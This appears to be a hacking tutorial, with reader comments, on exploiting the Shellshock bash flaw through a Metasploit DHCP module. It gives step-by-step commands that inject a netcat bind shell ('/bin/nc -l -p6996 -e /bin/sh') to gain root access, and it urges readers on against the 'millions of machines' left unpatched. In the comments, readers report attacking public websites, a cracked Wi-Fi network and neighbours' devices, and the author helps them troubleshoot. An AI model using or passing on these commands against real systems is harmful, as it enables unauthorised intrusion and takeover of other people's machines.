Hack Like a Pro: How to Hack the Shellshock Vulnerability

How to Hack the Shellshock Vulnerability

Hack Like a Pro: How to Hack the Shellshock Vulnerability

Welcome back, my hacker novitiates!

Every so often, a MAJOR vulnerability appears that makes millions of systems vulnerable to attack. The most recent, named Shellshock, basically leaves every Mac OS X, Linux, and UNIX system on the planet vulnerable. As nearly two-thirds of all web servers on planet Earth run one of these operating systems (primarily Linux), that's a whole lot of systems out there waiting to be harvested.

This vulnerability is one of the most serious in recent memory. Basically, it leaves nearly every form of Linux, Unix, and Mac OS X vulnerable to "remote code execution." This mean that the hacker can run their own code remotely and do whatever they want on the system, basically owning it.

Shellshock will be with us for quite a while, despite efforts to patch systems, as we are only beginning to understand the extent of this vulnerability. Every time a new patch is released, it almost immediately becomes obsolete as new vulnerabilities are being discovered daily. The first proof of concept involved running a CGI script on the vulnerable system, but that is only scratching the surface of what can be done with this vulnerability.

Many network and security admins are now sitting around pretty smug that they have patched their system and they are now safe. That is far from the truth! This vulnerability is linked to the BASH shell and any system calls it makes. That list is extremely long! Probably thousands of utilities and applications use BASH for system calls. Furthermore, nearly all the embedded systems, from security systems to automobiles to automated lighting systems use some form of Linux with a BASH shell. ALL are vulnerable to this hack.

Of course, the whole industry of IT security administrators are now scrambling to close this hole. Years of experience have taught me that many won't and many more will think they closed it and haven't (there is a fair amount of incompetence among IT security folks, as in other professions). In the meantime, millions are millions of machines are out there, just waiting for your best efforts.

Recently, our friends at Rapid7, the developers of Metasploit, released a quick and dirty module that exploits one of the first discovered Shellshock vulnerabilities, namely the exploitation of the BASH shell to send CGI scripts to an Apache server. In addition, they also developed a module that enables us to exploit Shellshock using the DHCP service. Let's use that one to attack a Linux system and see how it works.

Step 1: Start Metasploit

Let's begin, of course, by firing up Kali Linux and starting Metasploit. You should be greeted by a screen similar to the following one.

Step 2: Update Metasploit

Since this is a new Meatsploit module, it is not in your Metasploit Framework when you downloaded Kali, so we need to update Metasploit. Let's open a terminal and type:

kali > msfupdate

This might take awhile, so be patient.

Step 3: Find the Exploit

Now that we updated our Metasploit and presumably downloaded the new Shellshock modules, let's find this new exploit. In the Metasploit framework, type:

msf > search shellshock

As we can see, Metasploit found the auxiliary module for attacking the DHCP client using the Shellshock vulnerability.

Let's now load that module by typing:

msf > use auxiliary/server/dhclient/dhclient_bash_env

Now, let's type info to get more information on this module.

msf > info

We can see in the screenshot above each of the various options for this module and some basic information about it. The key parameters are CMD, SRVHOST, and NETMASK.

Step 4: Set Up the Module Parameters

Now, let's show options.

msf > show options

First, let's set the DHCP server IP. This is the SRVHOST parameter.

msf > set SVRHOST 192.168.131.254

Next, let's set the code that we want to inject through the BASH shell. Although, this module comes with a netcat command by default, let's change it slightly with a command that I have found gives us better and more reliable results.

msf > set CMD /bin/nc -l -p6996 -e /bin/sh

Lastly, let's set the NETMASK.

msf > set NETMASK 255.255.255.0

Finally, let's simply type "exploit" to run the module.

msf > exploit

When we do so, we simply get the message "Auxiliary module execution completed." In our case here, this simply means that we were able to run our CMD line using the Shellshock vulnerability to set up a netcat listener with root privileges on port 6996 piping out a BASH shell to whoever chooses to connect to it!

Step 5: Connect to the Exploited System

Now that we have injected netcat into the vulnerable system, we should be able to connect to that machine remotely with administrative/root privileges. We would then own that machine!

For demonstration purposes, let's connect to that system with a Windows machine remotely by connecting to the netcat listener. First, open a command prompt on the Windows system and type:

c::\nc 192.168.131.129 6996

When we do so, it will return a blank line. When we type "ifconfig":

ifconfig

It returns the network settings of the exploited Linux system. Now, to confirm our privilege level, let's type "whoami":

whoami

In this screenshot, you can see that we have not only been able to access the system remotely, but we have root privileges. We OWN this system!

The Shellshock vulnerability makes nearly every system that runs a version of UNIX, Linux, or Mac OS X vulnerable to exploitation. Since the vulnerability is related to the BASH shell and its system calls, the number of vulnerabilities and exploits will become nearly innumerable.

This hack utilizes the BASH system call to the DHCP client, but this is just one of many potential exploits. Apple and the major Linux distributions have all issued patches, but there are still innumerable ways to get past these patches. I expect them to be issuing new patches almost weekly as we find more and more exploits taking advantage of the Shellshock vulnerability.

I will keep you up to date on each of these new hacks, so keep coming back, my hacker novitiates!

Cover image via Steve Jenkins

50 Comments

This exploit works if you have Apache CGI enabled and bash vulnerable version right ? Even if you didnt't patch the bash package, how can you remote exploit this vulnerability if you don't have CGI on Apache ?

And the DHCP module assumes that you need to be in the local network in order to proceed right ? Or i'm seeing things in the wrong way ?

Thanks for another amazing article ;)

Ok. This exploit above, assumes that you are within the local area network to install the exploit and then you can take advantage of it from anywhere.

This vulnerability, Shellshock, will affect hundreds of potential applications and utilities. The CGI vulnerability was just the first. It appears that it will work, for instance, on VOIP and many others.

This is really shocking, no doubt. Is this like the new Heartbleed?

Scary enough, I think I could be vulnerable to this due to the huge amount of services I run on my dear Unixes (and as me, thousands out there).

The problem is that this exploit is still evolving, right? I can defend myself by the Metasploit module, but...

seems that updates and hope are the only reliable way, however, is this gaining the enough attention it deserves, although is useful to take advantage from?

Anyway, this is one of the ethical hackers roles (I think), demonstrating how easily can one be hacked, and you are doing it very well, great post.

Ciuffy:

This is much worse than Heartbleed. Heartbleed just leaked information while Shellshock can yield control via the root account.

OTW

Nice article as always. Here is some extra info I found that I was about to ask OTW about, but figured I'd google it first

"The bug is found in Bash's parsing code. There is an error in the way that Bash parses environment variables during its initialization sequence. Anything that can manipulate the environment variables has the potential to be a vector for this vulnerability.

DHCP Clients

DHCP clients based on the reference implementation from the Internet Systems Consortium (ISC) are also vulnerable. This includes most Linux and Unix systems, but OSX is unaffected. This vector can be exploited when the victim connects to a malicious DHCP server. The vulnerable DHCP client will use variables provided by the DHCP server and save them as environment variables. The DHCP client uses Bash to configure the network interfaces.

This can happen if the user connects to a public Wi-Fi access point or a rogue DHCP server.

Another possibility is that an attacker could use the CGI vector for the attack to compromise the DHCP service on a legitimate server.

http://www.zdnet.com/the-shellshock-faq-heres-what-you-need-to-know-7000034219/

I'm curious though, is this exploit attempting to force a dhcp variable change to the box we're attacking rather than waiting for a victim to connect to the same said "malicious dhcp server".

It can be done either way. It can be a malicious dhcp server or in this case, this hack takes advantage of the system's dhclient.

Thank you for the article, but I do have a few questions if you don't mind.

I'm very familiar with Kali / other Linux operating systems and am not new to it by any means. I have used other tools and followed your other articles with success. However, I am new to Metasploit and am trying my best to learn.

I understand everything up until you set the SRVHOST. Is it that I have to have a DHCP server running, and set SRVHOST to the same IP?

If so, how do I do that?

Why is it that when you connect to the machine you have a different IP?

Does the victim connect to the DHCP server, and then you connect to their IP via nc?

Also, nc isn't recognized in CMD in a test windows machine I have.

Thank you in advance for any insight you have. I tried to google around but I couldn't find anything specific on this.

System:

SRVHOST is the IP address of the DHCP server. Then, we coonnect to the victim's IP.

OTW

Great article and amazing demo.

My question is, this exploit delivered since 24/09 is only for server using DHCP and CGI enabled, what about others using fixed IP address

are they safe? or it is just a matter of time and we will discover the scope of the breach?.
I beleive that it is a very extended breach...

Any:

The vulnerability is with anything process that issues system calls through BASH. This demo is for the DHCP client, but other processes can be exploited as well. The CGI exploit is not dependent upon DHCP.

OTW

this is good demo to be exploit same i'm new user of metasploit but i have the base to exploit this vulnerabillity . thank you for tuto (great job)

OTW:

So we connect to the victim's IP after they've connected to the DHCP server's IP? Is that how they get the netcat?

Are they to enter the IP into their browser?

Thanks.

System:

You connect to the victim's IP by using the netcat command I have shown you in the tutorial from the command prompt.

OTW

OTW:

Yes, I understand that part. What I don't get is how the netcat gets to the victim in the first place.

Should I just setup a DHCP server, follow the tutorial all the way until the exploit command is entered - and then have the victim machine connect to the DHCP (then run nc)?

Basically: what do I do before I can run the nc command (after the exploit command is entered)?

The exploit installs a netcat listener on the victim. Then, you just connect to the listener.

You don't need to setup a DHCP server. I'm sure you already have one.

I'm sorry but I can't get seem to get a grasp .

I have a Mac here that I am trying to exploit via shellshock.

How is the exploit installing a netcat listener on the the victim if all I have defined is the DHCP server IP? What is the DHCP server even doing?

I really appreciate your help and I hope asking all these questions aren't causing you too much trouble. I'm just trying to learn this.

Could you help me understand how I can use this to basically get access to a remote Bash shell on the victim (the mac I'm testing on).

OTW:

Do I set SRVHOST to the IP of my victim?

Okay I think I have figured it out... kind of. Please correct me if I am wrong.

I got the IP of my DHCP server via the terminal (is just my router IP).

I run the exploit with that IP set as SRVHOST.

Both victim and I are connected on same LAN.

Then I connect to the IP of the victim.

I tried to do it this way but got the following error:

(UNKNOWN) 192.168.1.4 6996 (?) : Connection Refused

Now what? I'm positive I'm making a mistake somewhere but I don't know where.

Thank you.

Nevermind, I figured it out. Thanks for all the help :)

Glad you figured it out, System.

Can i ask you how you did that, Sir?
I will be glad to know .

I wanted to share with you this video from the channel computerphile, which demonstrates the fundamentals of this exploit:

it seems like the video won't load, I'm posting the link:

https://www.youtube.com/watch?v=MyldPMn95kk&list=FL087AGrah4UcxN6TuRgi5Ow

Thought this could fit in the topic.

Edit: And Also patch your Mac as soon as possible:https://mac-how-to.wonderhowto.com/how-to/every-mac-is-vulnerable-shellshock-bash-exploit-heres-patch-os-x-0157606/

Edit: I typed a wrong channel name.

Sir OTW,
Can i Use this exploit for public IPs(Web sites)?

i run the command "nc <server IP>" but it gives the following error:
root@kali:~# nc 62.60.138.239 6996
whoami
(UNKNOWN) 62.60.138.239 6996 (?) : Connection timed out

I have used the auxiliary that you against that web site (And i know its Linux)
What should i do?

I Also used itfor another web site but got this error:Connection Refused

Matt:

Do you understand this hack? We are installing netcat on our own system and then connecting back to it. I don't think you are doing it correctly and that's why it doesn't seem to work.

Please read the tutorials carefully.

OTW

At the point to launch the exploit by typing "exploit" i get this error:

Auxiliary failed: Msf::OptionValidateError The following options failed to validate: SRVHOST

To find the host ip i used the "route-n" command.
Im on the victim network, i cracked his wifi password.

Orios:

If you read my tutorial, you will see that SVRHOST is the IP of the DHCP server.

OTW

I have performed all the steps but i got this error in the end

(UNKNOWN) 192.168.1.100 6996 (?) : Connection Refused

I got The same problem that system freeze has--
I got the IP of my DHCP server via the terminal (is just my router IP).

I run the exploit with that IP set as SRVHOST.

Both victim and I are connected on same LAN.

Then I connect to the IP of the victim.

I tried to do it this way but got the following error:

(UNKNOWN) 192.168.1.4 6996 (?) : Connection Refused

First, which is the victim 192.168.1.100 or 192.168.1.4?

sorry victim is 192.168.1.100

Do an nmap scan and check to see whether port 6996 is open.

Also, I'm assuming the victim has netcat installed?

the victim Has netcat install but when i do nmap there is no port open 6996 what I am doing wrong Please correct me

Make certain the CMD line has the correct path to netcat.

I would try executing natcat on the victim and then try connecting. If you can, then the problem is in how you ran the metasploit module.

Hi, man!

Why I always got the private address such as 192.168.0.33 when I connect a PC to the DHCP server after I exploit the server? I have used many DHCP servers such as my own dlink router in my home, Cisco router in GNS 3 and I even set up my own DHCP server on ubuntu. Could you tell me why this happens?

Thanks a lot!!

Li:

I not sure what you question is asking me. Wouldn't you expect to get the same IP address?

OTW

Hi

I did it this way, could you please help me check it?

I set up dhcp server on one kali, and this dhcp server assigned an ip to another kali.

Then I use the second kali to exploit the first one.

Finally I use a windows command line to connect the first kali, just like you did, but it didn't work.

Could you help me check out my problem?

Thank you so much for your time!

I think you are misunderstanding this hack. You are NOT exploiting the DHCP server, but rather using the DHCP service to exploit and install malicious software on the client.

OTW

I got that, so you mean we need to run metasploit on the dhcp server?

No. You run Metasploit on the client, use the DHCP service to install the malicious software on the client (netcat) and exploit the client.

OK, thank you for your time, I will try it again!

I figured it out, thank you so much for this tutorial!!!!

Hi, OTW.
Is this still possible on iOS & other apple OSs, as of November 2015?

Basically, I had access to my neighbors AP, I did it through an Evil Twin, it's a shame, because the Bandwidth was top quality, They upgraded to a new version of the router/switch from their ISP, so I need to do it again.

I'm rambling on... my question is, if I had access again, they're a couple, one owns and iPhone and the other owns an iPad, is Shellshock effective on Apple devices still?

Thanks!

Does this work attacking a guest in virtualbox or is that treated as not on the LAN? It seems not to work, I just get a freeze for a little bit after typing nc 192.168.56.101 139 (port 6996 was not open on my guest and I adjusted CMD to '/bin/nc -l -p139 -e /bin/sh', I tried all open ports) then goes back to msfconsole.

I also changed SRVHOST to my host only adaptor VBoxnet0 IP 192.168.56.1 that my guests are connecting to and getting their DHCP IPs from.

Cheers

Key,

The target OS is basically any flavor of linux (kali included). I'll just replay a snippet of the article here: "The most recent, named Shellshock, basically leaves every Mac OS X, Linux, and UNIX system on the planet vulnerable."

SRVHOST needs to be set to the DHCP server address of your LAN. For consumer environments, the gateway (router) typically operates as a DHCP server as well, so set SRVHOST to the IP of your router. (understanding how the exploit works will make the "why" of this more clear).

The OS at 192.168.131.129 is one that is vulnerable to the shellshock vulnerability, so it's probably some form of linux.

Cheers

Share Your Thoughts

  • Hot
  • Latest